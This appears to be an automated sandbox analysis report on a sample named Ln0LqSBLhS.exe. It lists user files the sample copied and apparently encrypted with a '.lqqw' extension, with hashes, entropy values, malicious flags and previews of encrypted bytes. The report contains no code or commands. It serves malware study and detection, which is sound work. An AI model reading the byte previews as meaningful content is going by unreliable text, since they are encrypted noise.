                                                                                                                                                                                                    Preview: .u.i.......;...TJ+*f.28N.......F....(.k..W*L..y..._...A..z.|A...1.ReF%'.Gt.9Nq2.|.........+0#....A...y......<.Ld....O...?_..>.u>.Nq..........M.R..........6...P.Z)..u.\..6W.]K...p..=@uV.QS.j|c..3....w.66ms...c....@.....N.x.-.<5...$.")T...e.d>..5P..d.....C.....dr}C*z..........~;.v.OI.<P......][e....B..Gn2..N..3..(ZU.^F..Y......A..Q....{EM.!.........h.".R<JNH.7=Lq......t.>....7..m......K,%V@.U.].>y!.`....a.D........;s.K..O..3....M.....M.^.....+../....O.z..1g.....c.....j.|.a..5..g.Ezf/.rt.xb......4."..Y.g...e..16..d<..9=.x..w?.8/...'....|.n..}...n...A\..._.....C.6<...X...... .H.{G[.b.%{9............[cj...7...Y.H ....9[.....<<.[.......p.k. 4:.wx...^;......O....n.E...=.5..%.bSY.eC.`N.v..;mMF...D.V..]..S.....+.p..~..F...u.S....sb0@kH.'..a-..._"R.R.$_.9&..... ...(".F..^CY$&..~...N.Tn..r.:'....'..>w;.]..... ]..B..r.#f.>.{..........._....f:...x..g+(.........-..~7K.._i.5...N.2...59...&...!3!.../.IgcO.}..)\...=N._...?..9..L..d|.h.....J..a..ZW^Y:.P.7...T..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP\011Secret Key -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.9880896814949915
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:+uYLDUa/0ZHlFOYL6MxOenJfhjkWJ0oNMUV6/+kWwI3p33gAuw6b:2U5NOYLxIenJp/uoND6WY23QADi
                                                                                                                                                                                                    MD5:8660970EFF4571F0603B0E173E07B5C9
                                                                                                                                                                                                    SHA1:6D45823FEE4E74D9FB07C54479E699C44472FA99
                                                                                                                                                                                                    SHA-256:9F3B380482B4CFDE4F618D7A10B4478837CF14E01D85C4B89A90BD91DD401789
                                                                                                                                                                                                    SHA-512:236A5F95D900B52554AE9933EE4B6564B3760A0FFA348209D80B6DD22025838BC37F57C7AA4CC61BACFDD54C095CFCBD78BF1A60EA0A4132B8F91420E02C4648
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Hx.h.WoNK..~yN._..Nz..Z.f>.%.U,.4............z..I.q.....+r2.E."...M.7DFb...{.o..I..y.9..`.MH....S..abA.a.J2.z...B7H.7...s|..c'......;...nnkIe.}.....@;.4.O!.(..bb.|....E...0.a.o...C':.......~...M..@uj:UDg+..3M.......g|.n......-... f..Q.&. +].T4.1.N.;;.|yI).^..Bi1...?...e.8..J...<..a..@8..w...~Z.....#D;,...I...j.9..... Yb......9.U.!.}v.uy..V.0y....H.(..@.....v.)..pm.".D;H..k.=.O...8...).....4..8..y.)$f.g...l.rZ..z..R....s..p..^c..z.o...R.Vwi..WG.........v......CG..I@G...../o<m.v_...8..../.a..2.]N.......:~..<..=T.E`.......G#...?.}.)....f,...+.a.Cv. .?..u........u..........#.00..C.`.....-.........r...yp_.....O.;.gXO&....ri0O.......@W..cZ...W..9.......=^.....R.9..l...Q....V.+..li..""......0.S. .>c.@...F.I.(... iB.......$+k......K]..."u?.s... ....O..8~b..5.,......70\.u@.e.]..w.M...5I.....m..d...4.&....C..y)V.".!.Sc..m....l?...c..1.?+.=G..].X..i......:H.7?n.........`...7.r..h..lX.N.D.SH...1....@........M..x.F ....%..q......O...>v..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.999067324215175
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:2BtxyW3UTMPIgFzX4EViqlulICJgGvzt9GWQo3NfGqIZMn3GP:WyTMPDEEViziCJDRj+LV
                                                                                                                                                                                                    MD5:C40CA0F2F425B8FBE905A183E624FFDF
                                                                                                                                                                                                    SHA1:6CF3CB50FA8550DE8D82ED756B3B7201AEC35300
                                                                                                                                                                                                    SHA-256:13CDCBBEC772786D16A836AABE436712D94AFE29F85535F7D6E40B9F1794FB25
                                                                                                                                                                                                    SHA-512:60924DA7571434D5C9AF1C5BD5961994BCB5E16D9D03BED01C11CB13978BACC5F33B15576999FE19D8CCF9E077D987D3DA85F011BDC6820ED68F1AB9554F1A19
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....2.U.}.......0.jf..Ut.;.......v...,o...G.,..j.s.oC.F.\....96..l..O..V.......W.......`G.8.Q...'.+!g...WQcY.0 tS.TNlLg.G..}.....q./,.l...Q..H.D.gF.h=...k.hI[...(.U..41....=y.OeK.M...\....#2&E.Z7..3]..gH.....=J.../c......i(U.,T..C/..:.<.1......p2..W<P..k..x!.!...-zq1..-.]....L..........Ci'.4.H.ls.!?R..A.y.:Q.UJu..w.0...,D...w."...Z./.K*....&3N..,LsC=. $lw......._.R....r......h.ik..{0......I.T.E...ov{(........LS...S.6..S.m...~:.....t(.B.......n.rG...".=.9....F.....q..R@.'.k.R.$.B..J...N.f..O&.fm...e./.<.....t..zo.....w.....r\.....0.....4......).(.0....(-....).M^A...o97...P...Q.Z..@D;..zK.....Q.(..l._.C3..VC....d.U.d..Wdn.G....l.!.Z^...I.E`B.%....L.%.rsH.....L.E..q..<....'.1.....*m.O,.X.....U;A...%.q}BC...=lA.K....a..tr........."..%Da....y......v.&P,c&..x...o..>.G.7...(.M:.C+.hV...r..2.....q2.l.QO.@p.8.7..f..$..Q,.....8..S.0.i..CV@V......$.u.O.3U..R..%.....Q..U4G...._ ..p.......Z.Z<.t+{.f..]!._&cH;.......e~..D.{..Wqg...;.R}.F..A:T..h;/.
                                                                                                                                                                                                    C:\Users\user\Local Settings\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2318
                                                                                                                                                                                                    Entropy (8bit):7.919312851663093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Exr0dJV6Uss1VZ4w5hghAaHG0n0HRtaZLOphJN6kxD:EV0dJV6Uss1/4wkhAaHzoRsZE4k5
                                                                                                                                                                                                    MD5:2622682A7FD5D6365ED3A9E849D25114
                                                                                                                                                                                                    SHA1:F04E66A5D702ED6FE1734B163FE65D91114A6802
                                                                                                                                                                                                    SHA-256:6A58D0EA75DE875F2EC1AB08B5DE488DCCEB5C311C130B80B776E49F6B02F128
                                                                                                                                                                                                    SHA-512:3FB436FE0AA385F0471ED07ED833078F8445199CBA6712AD05FFCB0E2BB96D5ADD54A6592DB5DFCC80251614F7902707DE0EB6E1B4150B8EC33C2C93186648F1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 4..p..A.*.U..W...0."k.g$......9f.U.5R1.:.i. N......Df&(....<...PS.{........W.y.q..ft..u.....Z.1.w...!#o(I*..u..\...../E..$.....0...e.~0i..:.."..z.N\.....&...s.....sU(B.cC..F.,.U..7../x.$..&*..w....i.(.....Q.L......y....;...DB.[l........4.Z..4.E..T....%.Z........0+.,..s.....|.....-}l(H|,G...5f...C.,....</|T\....}.!.ED.7w.V ?....#L. .u...mA...f....VJ%....2..sih...BT..... h.....B...WZ<.m..M....!...X....`.w...a0.@....P6/.J..s.S..U.........{...F.fq.DO3.Z.A.e...8X....SB..-p..{..->r..zhY...%".c..E....+YW.QL..../.p@$.F.y....LL.[.`.@Og..>W.S..xq.r,.:....Wv._.?.'.,...RC.6yuU...D....T...v.x..-.%0.%.ND3..V.8...G......N..](O......2C.v+sr..:.Yg+.=...dJ`.@eGC....V.~.}.P........~..f=.......O....m...u..e.m..b..C.Gp.54.%.Y.2...!"......=q...P......... .!..a..y...!..W...tO6.z..7n..T..P.Z6.....Xk1Z.].(.@..RgR.qmm..c.t~`.|/..>.I.X.......x1.z[........[..dU.'..)0..".N.3.p.}g..R...k.."!.f..`R.P..VZ.t.z....S..+..s.U..y..XS........+.......cV.4..F.5.?]j...]..H.!sw>..'..9.
                                                                                                                                                                                                    C:\Users\user\Local Settings\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65881
                                                                                                                                                                                                    Entropy (8bit):7.997334182526539
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:YvjfJt91HHOESqQ8+jWh4EwktBBQjZZeRmVXKG2AeO+x6+BQFqxZMzsVd1fT/:Kt99HOPqEjWGRQaZZeU2XOw/Qm6IVd17
                                                                                                                                                                                                    MD5:D31B7ACE28DA3912F24B0078E2BCF7C2
                                                                                                                                                                                                    SHA1:EAEA50ADBE7DFF4A99442585E1A656EC6796CC7A
                                                                                                                                                                                                    SHA-256:7197C2CDB288486AF8EF2047334E7CFF59152791F9BF7289AE22C067591208FC
                                                                                                                                                                                                    SHA-512:5511BD5E909E91FEB5078E52C929DEBC2C95587C6F1CDD16ED85F2CF27203E8CE241083CC4B657BA158DEFF1AA9F3EBB1B5E821B746B592C9CC9346CA2F47B8F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .7...7q.]e)f..D...\$.^!.U3..j...`...z...R5^9....pn.........Iw.ET.c.....|..D...8.....r...lk..\.|4L%.0.w5[cO.d..."...z=.5..!.O.....C6N.0Q.gF..s.wI....;..;]{..J......qM.lS`...K...6P.%=..7.-/....wRq.....P[.gy........C..e..7p;.._......i.C.wC..Pi.b...i....kT0[...m.T..ZE..)c...F.......`..cs..F...^..?.U"....3P...#.....r..V..1.1F..T_>AR,G.;IJi..O.YoS$..E.,!..c..Rj..M.,h...K5....@jH...).-...D..`.^.S`...<i...6ja;....DMQk..E...W.P2(*..%w. m.K:....O.0m&.QVW.....]$1..C...lr...o...."..4..-.e1T...$.q.i.T....$..b-.....%.}...{b?E.....g...9;_p<...|?.<....{......[...9l.c.q. 4.F....:..U..=...F.I..H..}.3...iY<........B.b2....q?......v.....T.S...2...a....}.ib....;.{.lOb=.(.....2a[.|.Xt....o......x.@..].A |...l..B.v|L....M...z.k...M.(!Z....b....*..b..8.u.$`..}E..TL.K.0.8..C.Y....a...UN....2......'.1..5l.........s.!.....d.j.......O..........G.7o.#A8J<.Z..\.1ja.9.hL.....D.WF..-^)s.R.....y.J.........:..B.~..1...h7.l.......'.d}..GU..#._..REl8..];.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3289
                                                                                                                                                                                                    Entropy (8bit):7.944326550366996
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Flft7br1KPQuumDVLTGkFb/vIwR44XAmdy4nPXBac/MQwjVD9Ra0AOtZ3RyCfzIm:F3UY5mDBTGcbpxrd3LjwjDE/j2g1TPyH
                                                                                                                                                                                                    MD5:8D3BBBD8D389A9E9DCD7846F7B7178FC
                                                                                                                                                                                                    SHA1:FD51184CEB849723A658C2B03FF2E50AA1B5842C
                                                                                                                                                                                                    SHA-256:D65BCF60DFF9BE03AADFF80CE4E77E4717421AF1D90C518A2F74A06FD3F23B51
                                                                                                                                                                                                    SHA-512:B6350A71FD82317B0964DA2DFF6F02B41D6BE19281F71C25B6DD171AB264358EC22B1E6A950EC705C2226DAFFD69192DAE4B40ECC967E34A0E39F53B963921DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Q~.+.1....3.z6.....{*.6.L'..(jka...7U.....i.z....dC.0.C.b..W....r.~.f....<ye...%...y...U. B.@......\.?y#)..[ TQ..u*..x&....xe.CQ...."..5S_......B...d..L..r...._.l.`...B.1.m...[....<t.i[,5%JN..7...W.U.).&.w..c.<....."...v<!......)u&.^..>Jc..S;../.`..s"....5.d!.u.y..R.^..`1........w../kl.,..9n....6G.....m..ydE.1.]..DQ0R-....c.Nc6..O8...WT*......8..}w..R..YWC....qI...%.O .h._....T9E.3..iK..'...7....B.&T_.."v8...j.`..BT..M.....T\.OU........DZ.$..8...m.Xt.J..8.%.....%:....~....R;2..vkW...*.....u....0.bi...Aib..!V!..Xsm.E.}...2.......h-..p.. a.......Y....E..fw.B....+L}FN.!8.B..gy.h..,..bp8.c...O..T.T.p..4....w$.`.:l.H.......[.n..C....F.J......_$nk.Ra0....wOC5].W.......T..gT....(...>.^.F.C...8W...p..n.."X..1.h.....`.I.,..@.. v...yY.c..H....f..]..S...R.7.%C.....WOy{.@.%C.Q..xoMy.K..y...("'..tox.z.....].FkD...'.3...>.#..$.....h.4e......X8.P..n..KT.}..h...4...sb\i.rs...e.TKC.;....DFI.'..5....o$<..../..... v.~...o..?f...s........(.>..B.b.,.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749CFD-12B4.pma.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99878462797567
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:y9eyUXtB7sPac/eYrtGgRqR0kEcPAcaQoJDSIGfAODqMlFi70:qokyc/eYLRqR3PdmkIdODLlA70
                                                                                                                                                                                                    MD5:4EF6F7B575D4082032CAB4EDD625A041
                                                                                                                                                                                                    SHA1:DD1C108ABC22BC936B255F6A5D2B4C73673A2195
                                                                                                                                                                                                    SHA-256:9C38C609A801351A10524A65347F41E50B8326A67C2E387BAF0C23231F7E38C1
                                                                                                                                                                                                    SHA-512:1FEF9C452AB80F44A4306D949EEF0A96EED0F8DB84A6D07D947804484567918BD410AB28E37638EF69F99DD39AE9B8D4C7E727F7520992B507761526D02FFCC2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......mp...i.}/...d.H.=z.P....c&...Ao0U.uo<..X.rm.5......FV.z.$.^`.....eU94..#<..'...y.c.C.....M.0......2...o:.......E...|D.....Y.A.>.{h.!.l.W......w.|.T.a.............A.|....L.OD.......`..S.p..&#....o;..uJK...U..._......k..z...~....e"t.....L...8..}...D.m.?.Uv....OS..8i}.Bd.P..it....AA.....f.....`..^..?..8.H....Z..G.s....G......:Tw.q.............S..S.YRyJ.+..5..../M...v.I......g..r=.....G9.fu.8.i..l...Ur.'..k@.G..@P..;.S..a...L.....ms.s.g....+*.......).*.........L8;NA..058oX.f2B|-...v...N.....!..*|.#.....F..7.......K.{d..3&.f.".F.j).r..Cy...?1.sR.2.d....M~}.PO".Z.9C.K.k[.Q.....ga2..:.c.....1.".Hg.i.<.1$>~..@...#.d..V.......~0..a'x|..7.y|.M g.a6\...$te..z.Ai..`.B....U8,.V...a.F(..S.S...O.A...U.Dx.V8...0<ri...qZ...$yN`.&.,wo.V..^.......c.%...{.r.z..:....#..>i....O...9.Sy.5.Bf....*.$..!b....c..=.V~.......[A.2..5......FL)p. b.t.;....Uce^...H...o..+."...i.....].$.o.....D.RrN...L.Ry..]...T2.u....n....~...z..T...=8...0...........H.Gtt./.cz..M.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749DC8-E1C.pma.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998772649695497
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:qUbsxlJsgnWNLXaK09y7hJ84mZvwwL8rJKKllVJ5l7uogMOEBPYXr:9glJZWNWK+CdmdnIoalr3uo9hmr
                                                                                                                                                                                                    MD5:6AF16C26C98C5F1ED44760C0AF1F8695
                                                                                                                                                                                                    SHA1:7F655CC366548FD2DFEAD4A487ECBDD9CE01C093
                                                                                                                                                                                                    SHA-256:D22DCFADB3DC4250C3F8CDA24237393FF2F511C72C76444004D8E0A2A4738A26
                                                                                                                                                                                                    SHA-512:4BB154CA128BD5D491AEB6BA4BD5927026559AD15A880C3FA73D211911634D5AF6B04703C5D403A3215E2E7480671AFEA34FB82962A211F817EF2F0F46DF325B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....C.,..2r...C...:r.q..gG...o#..Y..^,p....@......Y..}I...}9)...t.''...!.q.WBb-......`<.*...C....5......wnh:.<pdpt...h.X{..N.tMt.c.YfM..(.Q.. ..>..)..@.p.L&cZm.o"?...O...s..&s...u..W.N..,H.w....C...GGt.?...x.].......5.@..:.W9...A..pMQ#g....#.....'b.....|...ndXB.....C.7a.N.,zs.O..3..M........rn.1}....u.,.l..@}....7..m4_.....o..j.s....9n ..9.8...pk........v..`q.....DA...}&......kD,)/`..'o+..1..o.y.$1@.. .kbc.5.. ..7.N.RK.....&..B..B.....M......C.....b.3.W?..`\...n...;....(-@...#-"...u....X...*S.ik...]./.>..../....t......Aj..l.q...*.m..qW....Kn..y.K..#l..[r/.d..kqn...X)......`.!..w.+...n.}.u.<....#.d.A..t.....w.$5[A.b.C.0.n...w.{/.$..f......-.l.*.1f...'V....C<q.R.C...9~..,#.v,K...}...`......fgCP...c.)..*..v....N.#^..SoG8.$..RO..8.W...@:.L....yg....9(G.<X^.....J&.R.Z.\.`..ED.).....I....BN..i2.o-. 5...=..V.bZt.c..g...D......Z.uI.#.s..D......5...33........Y.-.....H.M.....P...w...M.^...*&..(..i...~....%.'.VLpE{......r1#N....d|.$>9u"n@
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\CrashpadMetrics-active.pma.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998717313282192
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:iEHaLV4cJgjvEqTNOIWyg8j7bdvjSxqT1tpPiJnV:h6mc2jJTXbBSgptZYV
                                                                                                                                                                                                    MD5:DE74A9C756E681A928378A92F9502AA3
                                                                                                                                                                                                    SHA1:51AC285A7BD2AE3759F7A98E8D61739915EB7B9C
                                                                                                                                                                                                    SHA-256:D8BE52C38C50E40A702000286FC398895028F2D853D5B4F49D93D405DB055D94
                                                                                                                                                                                                    SHA-512:2483C6A7BB0483C55C1E31B9C4E0DC0BB969D3BB024B303CB4047BBF8024A97C5FFA4418561E400649802760805BB74C32531B6ED2F1709FD1E7C1ECB66B6C62
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....U.,F..g..T..Z.....pY..2..L5.BNY....(x^S..O..ja.M..u<..I......\..~k.)..#..&.. .c.7.)6e..[@.q.&&....l.S....3._...5.a...Z.~.Y.7.~....{..fX..7...R......5.Kn.e..........F.....@..:..E..%./WK..<..n.......K..AX.o..)a.....C.*iC@." . ......'bF=m.a.......c..3...m*....B..y...1j.......&P9.p.Z....(...SHT/.<.49.U.."..'........O.I{Q...7...bZeJNcVTnG.P.8..S.@.......&....%b.&.......z\.?...aP>.`Voe..Y.N...L.GxA.R.Q.&..Q...]..xT.aT.y....;o.vl*...S..A..l..V/.0...C..u`...v.jY.Q...g...*.......w.{.s..c.L..p.cW...=..3... ....]....s..[~1...l...}.-;.ml. .$M..>C...HX..e...o..9.J.i0J.......cr..j......L..1.er|..@T...g......:.4...1..tAA..$....Q.r..;F....Q.A.}<0.:n.y..I..X2.......4...b.r..^.....V.^..|.W.h.m..v...-d.g...p...%.L.~..>....3.....9_...W}...E3...3Nt.VL.r^$?a......u.V.vY@..Qj...w.7...&...m"S........\.tD.O.....W|tq..9...........;...n...rai$.]n..=.h....&..R.0.;..I`k...Spf$o.A.......'...w..._.....+.Q....'.rn......Sx.0P".M}u...:.;.........._.%]...^.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\CrashpadMetrics.pma.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998769903474529
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ek4gT4dgZB0ji8DaaUPBygcwe22j8+y9T6ZcDkqmfWdkQ7SX8DAwW:JtMdg8jiqcBUw/+BcOY7HDI
                                                                                                                                                                                                    MD5:1B9EDBD6BCB80DD0AF060DBA458623B7
                                                                                                                                                                                                    SHA1:BC9DB58B101CF51703E7C85AF0AD32F7AE0A69B5
                                                                                                                                                                                                    SHA-256:2D97FD48FF66A25D2F1CE309A3EB86EBE9101078FB1AE98AA8D44C0EE19E0F1F
                                                                                                                                                                                                    SHA-512:FD5A7C396BF3ADE1DFE01AA6D13DF59AF62025C5AD90FB0FAD57FF21EA3C8C64933BB89E251C9EB3354022E2B0E88332FEBD63100930AEC959F70BF456202890
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...y........2.eIc.'..a....v.q9f.;..lA<..&.&1.}......@M..w'.[gTr.m..X.:.e..S.Pb....^........N..:....g....M....K.-X.%s.xi.&...[.E|.5.&.>v.c..A.C.|.IH..3w.\{..a...m5.....O....c]......Y:.H.>r)....f.W.S.=......d..y..].g..Ei...\.p.9.....S.-..6...4..PM.v..5..9.j=^.8..p.0b...]....Yf.....: ...PRd...Yc..K`w..c*......ask.......u<...#..e.....x."$..... T,L.E....p1.Yd....D.......9..P.*G...-.w}.....K.v...Q....h...M5s.D.......E.T...k...R..C....U...%.5....H...Za..5A.mT...sl1D.i.......E<.;~.9....2k<A..6....JS.@..{..V..q.L.E..[.u./.B.....n...:.....Yj.N...Y.._..4.6c..a...S.:q;...D...:...v1.y.,....6.~".j .8CG......t......_...uI......X......>pj.e.;.|{..zX...g.....V.h.....$.RIC.X..vJ.d..S`......."5n.6W..%..D_H...#5..m\.v`Xy..-i.0./.8..^)K...(y.{..}.B....\.p..]@..w.P"<3..{.s.>=."-...Y.8..I*-.......*;..U.....?c..E....m.....N.......~.................Au.\t.f+.....w.._jXr>....A.a...1S.jO.b.....0.g....n.4.;....M.).9w.D.t.kw.@l....%T%1{ul...y.A%.....G..A
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Crashpad\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):369
                                                                                                                                                                                                    Entropy (8bit):7.316399815756833
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:F30e7oxSAQnogfJZCDBgJ2ycJ/4/ey6M+2IrGAN540gWSkLH75dExcii96Z:F3KxSlogxAO94hTj2gpNghcii9a
                                                                                                                                                                                                    MD5:A8899E1FFEC7D3C3BE1A126BADE539DB
                                                                                                                                                                                                    SHA1:828C4B55FF11B83AE844A7B511A0567679D679DD
                                                                                                                                                                                                    SHA-256:AD0872A9DFB8D8F7BB519EB69BC6E927ADB8E7C0176CDF8EBF9BAAA0C0AEF0A8
                                                                                                                                                                                                    SHA-512:EFF02661C89484B15A62C2309162825BB25B3014B5D1E34F8CEFCFAEC239654B0FC0D871A3E2851005490A933DC1D5FD6413D381952A658B7956D3A4AE3CB4CF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: #..w..D".~H...5M.......`...9.c._%..X.W...".8.@\\....z.YP.`.......NA...v...n+..-..zA..L..V.q(C.Z...D6l).I.w.......A.0..2..R..ey......|#.._.Z...7J.T.evd.......N..K..FI.l.....:........o>....?.j.O".-.<.t...\.@g.?../.. ..w'......w..w..L..?..h.E..M6.......=....L...:d.w.(<..k.w.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.ico.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.9986955408257705
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:Xz62i4nqN231T+3DbvVr0R47iQNIWWmrs65DYwDwMxJw8DTQ8JcF+x01H7p2:Xz6V++fvZ+47Rqcsm0uwMxGcZcAx6H7o
                                                                                                                                                                                                    MD5:8C0966782C009FEC503AB844757C9E42
                                                                                                                                                                                                    SHA1:A7FF56A7BA89A9630017B93FFA0D037E0D48A9AA
                                                                                                                                                                                                    SHA-256:62F9BF8093ED48C599182FF5F774415FB754D997EE911EC8A6F9BAB38372C87F
                                                                                                                                                                                                    SHA-512:F54F466A6BF674B9D16F49E6505E34967BCFD5D0FEE878A6D946B8D5F240EF1CC321F756F48D086E09026EB11381AFA745B314E012033F01C53C9C6190FB0954
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..N;.,..i.u.$<.,.[..dG..}.V..B..o..`/.ku.}.c....r.Y..k..L..|.).Aw.a\i."S....0.F..H....ge<.u.....P..C....S..\..A..............3.....r'...^Gi1......8.7..r`.n...y......?.&4U...L...g..A..HEY.OE^.F..{e.M......E..x...n..U.n,....Zh...IjSg.55.9.Ct....E.N.=.&.b.g...........w..I....aZ|C.j94.n.84..Z.s...W..I..~W.....M..z.F.3.._.+7...E..8......0G..-.}.E.v=.0.[....j\...s*..e...:%.)V..x5A3. )R!.UO....e..@.(..a...+...3.y.....h.>c.z*..t;.&.....g........k.....h.Y4.+....@/.Z..=..kt.....@........#_.p4JY......g..m....O.4...}.$..\z.R.uy.j.W.oi.THt..8.u7P...Ep.~B.=...[.7...d..b....SR~._=..rS`o=.z.dY:..&V...fI.a..@N..D..l|.../......M...tf..k>]....5}f .:'.m..{.R.4g..........(......f...0ga.}>.L..|f.8.....{..t..C._.i...x|r..'..DZvB..+-..!.*...zY..`..@.e....rpKI`..V...PaW#M#.{W~..2.u...e....:M .R..U4..P......}.....-r.Sb....IU....Ha...k.8.r.<.K.0.......p..>z.t..k.........p.l{C.#.WT.J.....[..fg...1.;......i.v.....u(Q.f>..._.....ek..C.m/.R.nH..........R.v
                                                                                                                                                                                                    C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.988902467958757
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:HANCESLFX34+KA3tJIF1Yhn8KlFvb/QpE+nDWnJPR0J:gNCFRXI1A3tJOY9tldJK
                                                                                                                                                                                                    MD5:35F26AF6F42E3E9DDD589DAFB0CAFFCA
                                                                                                                                                                                                    SHA1:8F76681B54CE8C380B1655A026252454BD934470
                                                                                                                                                                                                    SHA-256:DE00D63277BD051F1583A153CA9A38DFC8C04EDEB2AFE62D588370BDE10B5336
                                                                                                                                                                                                    SHA-512:189287A929E0F61241DB8DCBFD846C1FD6343F3A03E386FB415A92D68CBB2F43E76901B8BC3B952A0E3087C94D3AFCF901C10464CBF278DE9C155C1AC0391424
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
